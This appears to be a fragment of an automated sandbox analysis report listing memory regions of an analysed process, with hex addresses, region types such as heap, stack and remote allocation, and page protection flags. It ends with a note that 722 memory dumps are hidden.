400000
remote allocation
page execute and read and write
AB5E000
stack
page read and write
4970000
trusted library allocation
page read and write
92EE000
stack
page read and write
446000
remote allocation
page execute and read and write
4A30000
heap
page read and write
576D000
trusted library allocation
page read and write
5990000
heap
page read and write
A9E000
stack
page read and write
93AE000
stack
page read and write
14AE000
stack
page read and write
5444000
heap
page read and write
A2F0000
trusted library allocation
page read and write
6A01000
trusted library allocation
page read and write
17F0000
trusted library allocation
page read and write
6B9C000
trusted library allocation
page read and write
81B4000
trusted library allocation
page read and write
7CFE000
stack
page read and write
133A000
heap
page read and write
7F59000
trusted library allocation
page read and write
6FD4000
trusted library allocation
page read and write
ACA7000
trusted library allocation
page read and write
6945000
trusted library allocation
page read and write
6741000
trusted library allocation
page read and write
7A50000
trusted library allocation
page execute and read and write
2750000
trusted library allocation
page read and write
719F000
trusted library allocation
page read and write
A50000
heap
page read and write
672B000
trusted library allocation
page read and write
54E0000
trusted library allocation
page read and write
3490000
heap
page read and write
29D0000
trusted library allocation
page read and write
BBF0000
heap
page read and write
52C6000
trusted library allocation
page execute and read and write
BD7D000
stack
page read and write
66F0000
heap
page read and write
5C76000
heap
page read and write
7B52000
trusted library allocation
page read and write
70CA000
trusted library allocation
page read and write
57B0000
trusted library section
page readonly
A310000
trusted library allocation
page read and write
5120000
heap
page read and write
29F6000
trusted library allocation
page read and write
27C8000
trusted library allocation
page read and write
709E000
trusted library allocation
page read and write
BADF000
stack
page read and write
A9DE000
stack
page read and write
498D000
trusted library allocation
page execute and read and write
932E000
stack
page read and write
9A6E000
stack
page read and write
5110000
heap
page read and write
6E3E000
stack
page read and write
A81F000
stack
page read and write
5570000
heap
page read and write
5C50000
heap
page read and write
42A9000
trusted library allocation
page read and write
95F3000
heap
page read and write
79B0000
trusted library section
page read and write
53C0000
heap
page read and write
4F22000
trusted library allocation
page read and write
9F2E000
stack
page read and write
52A0000
trusted library allocation
page read and write
8DAD000
stack
page read and write
5446000
heap
page read and write
4F80000
heap
page read and write
7AF8000
trusted library allocation
page read and write
7A09000
trusted library allocation
page read and write
7093000
trusted library allocation
page read and write
517B000
stack
page read and write
71A4000
trusted library allocation
page read and write
133E000
heap
page read and write
1330000
heap
page read and write
8097000
trusted library allocation
page read and write
4F79000
trusted library section
page readonly
A260000
trusted library allocation
page execute and read and write
3130000
heap
page execute and read and write
73D2000
trusted library allocation
page read and write
45D0000
heap
page readonly
6B0C000
trusted library allocation
page read and write
321F000
stack
page read and write
6987000
trusted library allocation
page read and write
800F000
trusted library allocation
page read and write
79F0000
trusted library allocation
page read and write
14C0000
heap
page read and write
C90000
heap
page read and write
3048000
trusted library allocation
page read and write
7C49000
trusted library allocation
page read and write
7D7D000
stack
page read and write
ABE0000
trusted library allocation
page execute and read and write
6770000
trusted library allocation
page read and write
2FF0000
heap
page read and write
17E2000
trusted library allocation
page read and write
C09E000
stack
page read and write
790F000
trusted library allocation
page read and write
9B6E000
stack
page read and write
2C16000
trusted library allocation
page read and write
E10000
unkown
page readonly
52D7000
trusted library allocation
page execute and read and write
7B6E000
trusted library allocation
page read and write
17E0000
trusted library allocation
page read and write
1890000
heap
page read and write
81C0000
trusted library allocation
page read and write
AC5E000
stack
page read and write
7A35000
trusted library allocation
page read and write
6D1E000
stack
page read and write
ABC0000
trusted library allocation
page execute and read and write
5C55000
heap
page read and write
E60000
trusted library allocation
page read and write
3200000
heap
page read and write
9506000
trusted library allocation
page read and write
7B2E000
stack
page read and write
70C0000
trusted library allocation
page read and write
B59E000
stack
page read and write
6A34000
trusted library allocation
page read and write
4F00000
heap
page read and write
78D0000
heap
page read and write
C2A000
stack
page read and write
7090000
trusted library allocation
page read and write
1880000
trusted library allocation
page read and write
29F1000
trusted library allocation
page read and write
695D000
trusted library allocation
page read and write
BBA000
heap
page read and write
7AF6000
trusted library allocation
page read and write
AC80000
trusted library allocation
page read and write
There are 722 hidden memdumps, click here to show them.